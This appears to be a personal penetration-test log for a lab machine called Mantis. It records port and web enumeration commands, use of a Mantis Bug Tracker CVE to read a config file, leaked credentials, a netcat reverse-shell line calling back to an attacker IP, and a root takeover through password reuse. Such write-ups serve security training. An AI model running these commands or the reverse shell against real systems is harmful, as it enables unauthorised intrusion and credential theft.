Mantis

🧪 Pentest Log: {{date:2025-08-18}}

🔍 Target Information

Machine Name: Mantis
IP Address: 192.168.199.204
Operating System: Linux

ip=192.168.199.204

📡 Enumeration

🔌 Port Scanning

Command Used

ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt

nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt

Port 80

Web Content Enumeration

gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt

gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt

feroxbuster --url http://$ip

wpscan -url http://$ip

dirsearch -u http://$ip -r -o dirsearch.txt

nikto -h http://$ip

Found /bugtracker directory, visiting the website

Mantis Bug Tracker

Google for exploit, found CVE-2017-12419

https://mantisbt.org/bugs/view.php?id=23173

Use the exploit, view the /var/www/html/bugtracker/config/config_inc.php, found

administrator:prayingmantis

Port 3306

💣 Exploitation

📌 Vulnerability Summary

Service / Port: 80
Vulnerability Type: RCE

🚀 Exploit Execution

🔧 Exploit Method

Manual
Public Exploit
Custom Script

Tool / Script Used:

https://mantisbt.org/bugs/view.php?id=26091

busybox nc 192.168.45.163 -e /bin/bash;

🧬 Privilege Escalation

👤 Current Access

User: www-data
Groups: 33(www-data)
Shell Type: reverse shell

🔍 Enumeration

Schedule Tasks:

./pspy64

found

CMD: UID=1000 PID=5747 | mysqldump -u bugtracker -pBugTracker007 bugtracker

🔓 Privilege Escalation Exploit

📌 Exploit Summary

Technique Used: Password reuse
Target Binary/Service: su
Reference / Source: N/A

🔧 Exploit Steps

Smash to root

su mantis

sudo su -